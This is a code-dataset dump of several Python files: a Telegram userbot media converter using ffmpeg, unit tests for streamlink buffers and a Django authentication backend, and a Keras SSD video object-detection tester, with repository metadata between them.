voice_note=voice_note,
supports_streaming=supports_streaming,
progress_callback=lambda d, t: asyncio.get_event_loop().create_task(
progress(d, t, event, c_time, "trying to upload")
)
)
ms_two = (end_two - end).seconds
os.remove(new_required_file_name)
await event.edit(f"converted in {ms_two} seconds")
| 37.110092
| 103
| 0.5644
|
import asyncio
import os
import time
from datetime import datetime
from userbot.utils import admin_cmd, progress
@borg.on(admin_cmd(pattern="nfc (.*)"))
async def _(event):
if event.fwd_from:
return
input_str = event.pattern_match.group(1)
reply_message = await event.get_reply_message()
if reply_message is None:
await event.edit("reply to a media to use the `nfc` operation.\nInspired by @FileConverterBot")
return
await event.edit("trying to download media file, to my local")
try:
start = datetime.now()
c_time = time.time()
downloaded_file_name = await borg.download_media(
reply_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=lambda d, t: asyncio.get_event_loop().create_task(
progress(d, t, event, c_time, "trying to download")
)
)
except Exception as e:
await event.edit(str(e))
else:
end = datetime.now()
ms = (end - start).seconds
await event.edit("Downloaded to `{}` in {} seconds.".format(downloaded_file_name, ms))
new_required_file_name = ""
new_required_file_caption = ""
command_to_run = []
force_document = False
voice_note = False
supports_streaming = False
if input_str == "voice":
new_required_file_caption = "NLFC_" + str(round(time.time())) + ".opus"
new_required_file_name = Config.TMP_DOWNLOAD_DIRECTORY + "/" + new_required_file_caption
command_to_run = [
"ffmpeg",
"-i",
downloaded_file_name,
"-map",
"0:a",
"-codec:a",
"libopus",
"-b:a",
"100k",
"-vbr",
"on",
new_required_file_name
]
voice_note = True
supports_streaming = True
elif input_str == "mp3":
new_required_file_caption = "NLFC_" + str(round(time.time())) + ".mp3"
new_required_file_name = Config.TMP_DOWNLOAD_DIRECTORY + "/" + new_required_file_caption
command_to_run = [
"ffmpeg",
"-i",
downloaded_file_name,
"-vn",
new_required_file_name
]
voice_note = False
supports_streaming = True
else:
await event.edit("not supported")
os.remove(downloaded_file_name)
return
logger.info(command_to_run)
process = await asyncio.create_subprocess_exec(
*command_to_run,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
stdout, stderr = await process.communicate()
e_response = stderr.decode().strip()
t_response = stdout.decode().strip()
os.remove(downloaded_file_name)
if os.path.exists(new_required_file_name):
end_two = datetime.now()
await borg.send_file(
entity=event.chat_id,
file=new_required_file_name,
caption="`File Successfully converted by` @kannappan04",
allow_cache=False,
silent=True,
force_document=force_document,
voice_note=voice_note,
supports_streaming=supports_streaming,
progress_callback=lambda d, t: asyncio.get_event_loop().create_task(
progress(d, t, event, c_time, "trying to upload")
)
)
ms_two = (end_two - end).seconds
os.remove(new_required_file_name)
await event.edit(f"converted in {ms_two} seconds")
| true
| true
|
790de0eafb238d094bd686b29f075e37c87c9f95
| 3,638
|
py
|
Python
|
tests/test_buffer.py
|
xcgx/streamlink
|
b635e0d9d0fe9363817a96ec7d31faefed95cb57
|
[
"BSD-2-Clause"
] | 10
|
2017-04-10T18:25:41.000Z
|
2021-09-15T20:14:58.000Z
|
tests/test_buffer.py
|
xcgx/streamlink
|
b635e0d9d0fe9363817a96ec7d31faefed95cb57
|
[
"BSD-2-Clause"
] | 9
|
2020-04-04T09:49:52.000Z
|
2020-04-21T01:52:02.000Z
|
tests/test_buffer.py
|
xcgx/streamlink
|
b635e0d9d0fe9363817a96ec7d31faefed95cb57
|
[
"BSD-2-Clause"
] | 12
|
2022-01-30T23:34:18.000Z
|
2022-03-26T17:09:43.000Z
|
import unittest
from streamlink.buffers import Buffer, RingBuffer
class TestBuffer(unittest.TestCase):
def setUp(self):
self.buffer = Buffer()
def test_write(self):
self.buffer.write(b"1" * 8192)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192 + 4096)
def test_read(self):
self.buffer.write(b"1" * 8192)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192 + 4096)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.read(), b"2" * 4096)
self.assertEqual(self.buffer.read(4096), b"")
self.assertEqual(self.buffer.read(), b"")
self.assertEqual(self.buffer.length, 0)
def test_readwrite(self):
self.buffer.write(b"1" * 8192)
self.assertEqual(self.buffer.length, 8192)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.length, 4096)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192)
self.assertEqual(self.buffer.read(1), b"1")
self.assertEqual(self.buffer.read(4095), b"1" * 4095)
self.assertEqual(self.buffer.read(8192), b"2" * 4096)
self.assertEqual(self.buffer.read(8192), b"")
self.assertEqual(self.buffer.read(), b"")
self.assertEqual(self.buffer.length, 0)
def test_close(self):
self.buffer.write(b"1" * 8192)
self.assertEqual(self.buffer.length, 8192)
self.buffer.close()
self.buffer.write(b"2" * 8192)
self.assertEqual(self.buffer.length, 8192)
def test_reuse_input(self):
"""Objects should be reusable after write()"""
original = b"original"
tests = [bytearray(original), memoryview(bytearray(original))]
for data in tests:
self.buffer.write(data)
data[:] = b"reused!!"
self.assertEqual(self.buffer.read(), original)
def test_read_empty(self):
self.assertRaises(
StopIteration,
lambda: next(self.buffer._iterate_chunks(10)))
class TestRingBuffer(unittest.TestCase):
BUFFER_SIZE = 8192 * 4
def setUp(self):
self.buffer = RingBuffer(size=self.BUFFER_SIZE)
def test_write(self):
self.buffer.write(b"1" * 8192)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192 + 4096)
def test_read(self):
self.buffer.write(b"1" * 8192)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192 + 4096)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.read(), b"2" * 4096)
self.assertEqual(self.buffer.length, 0)
def test_read_timeout(self):
self.assertRaises(
IOError,
self.buffer.read, timeout=0.1)
def test_write_after_close(self):
self.buffer.close()
self.buffer.write(b"1" * 8192)
self.assertEqual(self.buffer.length, 0)
self.assertTrue(self.buffer.closed)
def test_resize(self):
self.assertEqual(self.buffer.buffer_size, self.BUFFER_SIZE)
self.buffer.resize(self.BUFFER_SIZE * 2)
self.assertEqual(self.buffer.buffer_size, self.BUFFER_SIZE * 2)
def test_free(self):
self.assertEqual(self.buffer.free, self.BUFFER_SIZE)
self.buffer.write(b'1' * 100)
self.assertEqual(self.buffer.free, self.BUFFER_SIZE - 100)
| 33.072727
| 71
| 0.628642
|
import unittest
from streamlink.buffers import Buffer, RingBuffer
class TestBuffer(unittest.TestCase):
def setUp(self):
self.buffer = Buffer()
def test_write(self):
self.buffer.write(b"1" * 8192)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192 + 4096)
def test_read(self):
self.buffer.write(b"1" * 8192)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192 + 4096)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.read(), b"2" * 4096)
self.assertEqual(self.buffer.read(4096), b"")
self.assertEqual(self.buffer.read(), b"")
self.assertEqual(self.buffer.length, 0)
def test_readwrite(self):
self.buffer.write(b"1" * 8192)
self.assertEqual(self.buffer.length, 8192)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.length, 4096)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192)
self.assertEqual(self.buffer.read(1), b"1")
self.assertEqual(self.buffer.read(4095), b"1" * 4095)
self.assertEqual(self.buffer.read(8192), b"2" * 4096)
self.assertEqual(self.buffer.read(8192), b"")
self.assertEqual(self.buffer.read(), b"")
self.assertEqual(self.buffer.length, 0)
def test_close(self):
self.buffer.write(b"1" * 8192)
self.assertEqual(self.buffer.length, 8192)
self.buffer.close()
self.buffer.write(b"2" * 8192)
self.assertEqual(self.buffer.length, 8192)
def test_reuse_input(self):
original = b"original"
tests = [bytearray(original), memoryview(bytearray(original))]
for data in tests:
self.buffer.write(data)
data[:] = b"reused!!"
self.assertEqual(self.buffer.read(), original)
def test_read_empty(self):
self.assertRaises(
StopIteration,
lambda: next(self.buffer._iterate_chunks(10)))
class TestRingBuffer(unittest.TestCase):
BUFFER_SIZE = 8192 * 4
def setUp(self):
self.buffer = RingBuffer(size=self.BUFFER_SIZE)
def test_write(self):
self.buffer.write(b"1" * 8192)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192 + 4096)
def test_read(self):
self.buffer.write(b"1" * 8192)
self.buffer.write(b"2" * 4096)
self.assertEqual(self.buffer.length, 8192 + 4096)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.read(4096), b"1" * 4096)
self.assertEqual(self.buffer.read(), b"2" * 4096)
self.assertEqual(self.buffer.length, 0)
def test_read_timeout(self):
self.assertRaises(
IOError,
self.buffer.read, timeout=0.1)
def test_write_after_close(self):
self.buffer.close()
self.buffer.write(b"1" * 8192)
self.assertEqual(self.buffer.length, 0)
self.assertTrue(self.buffer.closed)
def test_resize(self):
self.assertEqual(self.buffer.buffer_size, self.BUFFER_SIZE)
self.buffer.resize(self.BUFFER_SIZE * 2)
self.assertEqual(self.buffer.buffer_size, self.BUFFER_SIZE * 2)
def test_free(self):
self.assertEqual(self.buffer.free, self.BUFFER_SIZE)
self.buffer.write(b'1' * 100)
self.assertEqual(self.buffer.free, self.BUFFER_SIZE - 100)
| true
| true
|
790de139870f747ae341b9866271e007ce38a944
| 3,093
|
py
|
Python
|
dakara_server/users/tests/test_backends.py
|
DakaraProject/dakara-server
|
b28fc1a8561e431d562102932f3d6ff3607e545b
|
[
"MIT"
] | 4
|
2018-07-24T18:22:16.000Z
|
2020-01-24T16:30:54.000Z
|
dakara_server/users/tests/test_backends.py
|
DakaraProject/dakara-server
|
b28fc1a8561e431d562102932f3d6ff3607e545b
|
[
"MIT"
] | 88
|
2017-11-04T08:58:02.000Z
|
2022-03-30T11:39:08.000Z
|
dakara_server/users/tests/test_backends.py
|
DakaraProject/dakara-server
|
b28fc1a8561e431d562102932f3d6ff3607e545b
|
[
"MIT"
] | 1
|
2018-05-05T15:37:20.000Z
|
2018-05-05T15:37:20.000Z
|
from unittest.mock import MagicMock
from django.core.exceptions import ValidationError
from users.backends import DakaraModelBackend
from users.tests.base_test import UsersAPITestCase, config_email_disabled
class DakaraModelBackendTestCase(UsersAPITestCase):
"""Test the authentication backend."""
def setUp(self):
# create a user without any rights
self.user = self.create_user("TestUser", email="test@user.com", password="pass")
def test_authenticate_username_superuser(self):
"""Test to authenticate as superuser."""
self.user.is_superuser = True
self.user.validated_by_email = False
self.user.validated_by_manager = False
self.user.save()
backend = DakaraModelBackend()
self.assertEqual(
backend.authenticate(MagicMock(), username="TestUser", password="pass"),
self.user,
)
def test_authenticate_username_not_active(self):
"""Test to authenticate an inactive user."""
self.user.is_active = False
self.user.save()
backend = DakaraModelBackend()
self.assertIsNone(
backend.authenticate(MagicMock(), username="TestUser", password="pass"),
)
def test_authenticate_username_not_validated_by_email(self):
"""Test to authenticate when not validated by email."""
self.user.validated_by_email = False
self.user.validated_by_manager = True
self.user.save()
backend = DakaraModelBackend()
with self.assertRaisesRegex(
ValidationError, "This user email has not been validated"
):
backend.authenticate(MagicMock(), username="TestUser", password="pass")
@config_email_disabled
def test_authenticate_username_not_validated_by_email_no_email(self):
"""Test to authenticate when not validated by email and emails disabled."""
self.user.validated_by_email = False
self.user.validated_by_manager = True
self.user.save()
backend = DakaraModelBackend()
self.assertEqual(
backend.authenticate(MagicMock(), username="TestUser", password="pass"),
self.user,
)
def test_authenticate_username_not_validated_by_manager(self):
"""Test to authenticate when not validated by manager."""
self.user.validated_by_email = True
self.user.validated_by_manager = False
self.user.save()
backend = DakaraModelBackend()
with self.assertRaisesRegex(
ValidationError, "This user account has not been validated by a manager"
):
backend.authenticate(MagicMock(), username="TestUser", password="pass")
def test_authenticate_username_ok(self):
"""Test to authenticate."""
self.user.validated_by_email = True
self.user.validated_by_manager = True
self.user.save()
backend = DakaraModelBackend()
self.assertEqual(
backend.authenticate(MagicMock(), username="TestUser", password="pass"),
self.user,
)
| 35.551724
| 88
| 0.66602
|
from unittest.mock import MagicMock
from django.core.exceptions import ValidationError
from users.backends import DakaraModelBackend
from users.tests.base_test import UsersAPITestCase, config_email_disabled
class DakaraModelBackendTestCase(UsersAPITestCase):
def setUp(self):
self.user = self.create_user("TestUser", email="test@user.com", password="pass")
def test_authenticate_username_superuser(self):
self.user.is_superuser = True
self.user.validated_by_email = False
self.user.validated_by_manager = False
self.user.save()
backend = DakaraModelBackend()
self.assertEqual(
backend.authenticate(MagicMock(), username="TestUser", password="pass"),
self.user,
)
def test_authenticate_username_not_active(self):
self.user.is_active = False
self.user.save()
backend = DakaraModelBackend()
self.assertIsNone(
backend.authenticate(MagicMock(), username="TestUser", password="pass"),
)
def test_authenticate_username_not_validated_by_email(self):
self.user.validated_by_email = False
self.user.validated_by_manager = True
self.user.save()
backend = DakaraModelBackend()
with self.assertRaisesRegex(
ValidationError, "This user email has not been validated"
):
backend.authenticate(MagicMock(), username="TestUser", password="pass")
@config_email_disabled
def test_authenticate_username_not_validated_by_email_no_email(self):
self.user.validated_by_email = False
self.user.validated_by_manager = True
self.user.save()
backend = DakaraModelBackend()
self.assertEqual(
backend.authenticate(MagicMock(), username="TestUser", password="pass"),
self.user,
)
def test_authenticate_username_not_validated_by_manager(self):
self.user.validated_by_email = True
self.user.validated_by_manager = False
self.user.save()
backend = DakaraModelBackend()
with self.assertRaisesRegex(
ValidationError, "This user account has not been validated by a manager"
):
backend.authenticate(MagicMock(), username="TestUser", password="pass")
def test_authenticate_username_ok(self):
self.user.validated_by_email = True
self.user.validated_by_manager = True
self.user.save()
backend = DakaraModelBackend()
self.assertEqual(
backend.authenticate(MagicMock(), username="TestUser", password="pass"),
self.user,
)
| true
| true
|
790de37a120d52978b54761134121afb95f0f831
| 7,659
|
py
|
Python
|
yassd/testing_utils/videotest.py
|
hanhejia/SSD
|
0c5684ad786768b46b119fb503f4f7174e2c78ed
|
[
"MIT"
] | null | null | null |
yassd/testing_utils/videotest.py
|
hanhejia/SSD
|
0c5684ad786768b46b119fb503f4f7174e2c78ed
|
[
"MIT"
] | null | null | null |
yassd/testing_utils/videotest.py
|
hanhejia/SSD
|
0c5684ad786768b46b119fb503f4f7174e2c78ed
|
[
"MIT"
] | null | null | null |
""" A class for testing a SSD model on a video file or webcam """
import cv2
import keras
from keras.applications.imagenet_utils import preprocess_input
from keras.backend.tensorflow_backend import set_session
from keras.models import Model
from keras.preprocessing import image
import pickle
import numpy as np
from random import shuffle
from scipy.misc import imread, imresize
from timeit import default_timer as timer
import sys
sys.path.append("..")
from ssd_utils import BBoxUtility
class VideoTest(object):
""" Class for testing a trained SSD model on a video file and show the
result in a window. Class is designed so that one VideoTest object
can be created for a model, and the same object can then be used on
multiple videos and webcams.
Arguments:
class_names: A list of strings, each containing the name of a class.
The first name should be that of the background class
which is not used.
model: An SSD model. It should already be trained for
images similar to the video to test on.
input_shape: The shape that the model expects for its input,
as a tuple, for example (300, 300, 3)
bbox_util: An instance of the BBoxUtility class in ssd_utils.py
The BBoxUtility needs to be instantiated with
the same number of classes as the length of
class_names.
"""
def __init__(self, class_names, model, input_shape):
self.class_names = class_names
self.num_classes = len(class_names)
self.model = model
self.input_shape = input_shape
self.bbox_util = BBoxUtility(self.num_classes)
# Create unique and somewhat visually distinguishable bright
# colors for the different classes.
self.class_colors = []
for i in range(0, self.num_classes):
# This can probably be written in a more elegant manner
hue = 255*i/self.num_classes
col = np.zeros((1,1,3)).astype("uint8")
col[0][0][0] = hue
col[0][0][1] = 128 # Saturation
col[0][0][2] = 255 # Value
cvcol = cv2.cvtColor(col, cv2.COLOR_HSV2BGR)
col = (int(cvcol[0][0][0]), int(cvcol[0][0][1]), int(cvcol[0][0][2]))
self.class_colors.append(col)
def run(self, video_path = 0, start_frame = 0, conf_thresh = 0.6):
""" Runs the test on a video (or webcam)
# Arguments
video_path: A file path to a video to be tested on. Can also be a number,
in which case the webcam with the same number (i.e. 0) is
used instead
start_frame: The number of the first frame of the video to be processed
by the network.
conf_thresh: Threshold of confidence. Any boxes with lower confidence
are not visualized.
"""
vid = cv2.VideoCapture(video_path)
if not vid.isOpened():
raise IOError(("Couldn't open video file or webcam. If you're "
"trying to open a webcam, make sure you video_path is an integer!"))
# Compute aspect ratio of video
vidw = vid.get(cv2.CAP_PROP_FRAME_WIDTH)
vidh = vid.get(cv2.CAP_PROP_FRAME_HEIGHT)
vidar = vidw/vidh
# Skip frames until reaching start_frame
if start_frame > 0:
vid.set(cv2.CAP_PROP_POS_MSEC, start_frame)
accum_time = 0
curr_fps = 0
fps = "FPS: ??"
prev_time = timer()
while True:
retval, orig_image = vid.read()
if not retval:
print("Done!")
return
im_size = (self.input_shape[0], self.input_shape[1])
resized = cv2.resize(orig_image, im_size)
rgb = cv2.cvtColor(resized, cv2.COLOR_BGR2RGB)
# Reshape to original aspect ratio for later visualization
# The resized version is used, to visualize what kind of resolution
# the network has to work with.
to_draw = cv2.resize(resized, (int(self.input_shape[0]*vidar), self.input_shape[1]))
# Use model to predict
inputs = [image.img_to_array(rgb)]
tmp_inp = np.array(inputs)
x = preprocess_input(tmp_inp)
y = self.model.predict(x)
# This line creates a new TensorFlow device every time. Is there a
# way to avoid that?
results = self.bbox_util.detection_out(y)
if len(results) > 0 and len(results[0]) > 0:
# Interpret output, only one frame is used
det_label = results[0][:, 0]
det_conf = results[0][:, 1]
det_xmin = results[0][:, 2]
det_ymin = results[0][:, 3]
det_xmax = results[0][:, 4]
det_ymax = results[0][:, 5]
top_indices = [i for i, conf in enumerate(det_conf) if conf >= conf_thresh]
top_conf = det_conf[top_indices]
top_label_indices = det_label[top_indices].tolist()
top_xmin = det_xmin[top_indices]
top_ymin = det_ymin[top_indices]
top_xmax = det_xmax[top_indices]
top_ymax = det_ymax[top_indices]
for i in range(top_conf.shape[0]):
xmin = int(round(top_xmin[i] * to_draw.shape[1]))
ymin = int(round(top_ymin[i] * to_draw.shape[0]))
xmax = int(round(top_xmax[i] * to_draw.shape[1]))
ymax = int(round(top_ymax[i] * to_draw.shape[0]))
# Draw the box on top of the to_draw image
class_num = int(top_label_indices[i])
cv2.rectangle(to_draw, (xmin, ymin), (xmax, ymax),
self.class_colors[class_num], 2)
text = self.class_names[class_num] + " " + ('%.2f' % top_conf[i])
text_top = (xmin, ymin-10)
text_bot = (xmin + 80, ymin + 5)
text_pos = (xmin + 5, ymin)
cv2.rectangle(to_draw, text_top, text_bot, self.class_colors[class_num], -1)
cv2.putText(to_draw, text, text_pos, cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0,0,0), 1)
# Calculate FPS
# This computes FPS for everything, not just the model's execution
# which may or may not be what you want
curr_time = timer()
exec_time = curr_time - prev_time
prev_time = curr_time
accum_time = accum_time + exec_time
curr_fps = curr_fps + 1
if accum_time > 1:
accum_time = accum_time - 1
fps = "FPS: " + str(curr_fps)
curr_fps = 0
# Draw FPS in top left corner
cv2.rectangle(to_draw, (0,0), (50, 17), (255,255,255), -1)
cv2.putText(to_draw, fps, (3,10), cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0,0,0), 1)
cv2.imshow("SSD result", to_draw)
cv2.waitKey(10)
| 41.625
| 100
| 0.536362
|
import cv2
import keras
from keras.applications.imagenet_utils import preprocess_input
from keras.backend.tensorflow_backend import set_session
from keras.models import Model
from keras.preprocessing import image
import pickle
import numpy as np
from random import shuffle
from scipy.misc import imread, imresize
from timeit import default_timer as timer
import sys
sys.path.append("..")
from ssd_utils import BBoxUtility
class VideoTest(object):
def __init__(self, class_names, model, input_shape):
self.class_names = class_names
self.num_classes = len(class_names)
self.model = model
self.input_shape = input_shape
self.bbox_util = BBoxUtility(self.num_classes)
self.class_colors = []
for i in range(0, self.num_classes):
hue = 255*i/self.num_classes
col = np.zeros((1,1,3)).astype("uint8")
col[0][0][0] = hue
col[0][0][1] = 128
col[0][0][2] = 255
cvcol = cv2.cvtColor(col, cv2.COLOR_HSV2BGR)
col = (int(cvcol[0][0][0]), int(cvcol[0][0][1]), int(cvcol[0][0][2]))
self.class_colors.append(col)
def run(self, video_path = 0, start_frame = 0, conf_thresh = 0.6):
vid = cv2.VideoCapture(video_path)
if not vid.isOpened():
raise IOError(("Couldn't open video file or webcam. If you're "
"trying to open a webcam, make sure you video_path is an integer!"))
vidw = vid.get(cv2.CAP_PROP_FRAME_WIDTH)
vidh = vid.get(cv2.CAP_PROP_FRAME_HEIGHT)
vidar = vidw/vidh
if start_frame > 0:
vid.set(cv2.CAP_PROP_POS_MSEC, start_frame)
accum_time = 0
curr_fps = 0
fps = "FPS: ??"
prev_time = timer()
while True:
retval, orig_image = vid.read()
if not retval:
print("Done!")
return
im_size = (self.input_shape[0], self.input_shape[1])
resized = cv2.resize(orig_image, im_size)
rgb = cv2.cvtColor(resized, cv2.COLOR_BGR2RGB)
to_draw = cv2.resize(resized, (int(self.input_shape[0]*vidar), self.input_shape[1]))
inputs = [image.img_to_array(rgb)]
tmp_inp = np.array(inputs)
x = preprocess_input(tmp_inp)
y = self.model.predict(x)
results = self.bbox_util.detection_out(y)
if len(results) > 0 and len(results[0]) > 0:
det_label = results[0][:, 0]
det_conf = results[0][:, 1]
det_xmin = results[0][:, 2]
det_ymin = results[0][:, 3]
det_xmax = results[0][:, 4]
det_ymax = results[0][:, 5]
top_indices = [i for i, conf in enumerate(det_conf) if conf >= conf_thresh]
top_conf = det_conf[top_indices]
top_label_indices = det_label[top_indices].tolist()
top_xmin = det_xmin[top_indices]
top_ymin = det_ymin[top_indices]
top_xmax = det_xmax[top_indices]
top_ymax = det_ymax[top_indices]
for i in range(top_conf.shape[0]):
xmin = int(round(top_xmin[i] * to_draw.shape[1]))
ymin = int(round(top_ymin[i] * to_draw.shape[0]))
xmax = int(round(top_xmax[i] * to_draw.shape[1]))
ymax = int(round(top_ymax[i] * to_draw.shape[0]))
class_num = int(top_label_indices[i])
cv2.rectangle(to_draw, (xmin, ymin), (xmax, ymax),
self.class_colors[class_num], 2)
text = self.class_names[class_num] + " " + ('%.2f' % top_conf[i])
text_top = (xmin, ymin-10)
text_bot = (xmin + 80, ymin + 5)
text_pos = (xmin + 5, ymin)
cv2.rectangle(to_draw, text_top, text_bot, self.class_colors[class_num], -1)
cv2.putText(to_draw, text, text_pos, cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0,0,0), 1)
# which may or may not be what you want
curr_time = timer()
exec_time = curr_time - prev_time
prev_time = curr_time
accum_time = accum_time + exec_time
curr_fps = curr_fps + 1
if accum_time > 1:
accum_time = accum_time - 1
fps = "FPS: " + str(curr_fps)
curr_fps = 0
# Draw FPS in top left corner
cv2.rectangle(to_draw, (0,0), (50, 17), (255,255,255), -1)
cv2.putText(to_draw, fps, (3,10), cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0,0,0), 1)
cv2.imshow("SSD result", to_draw)
cv2.waitKey(10)
| true
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.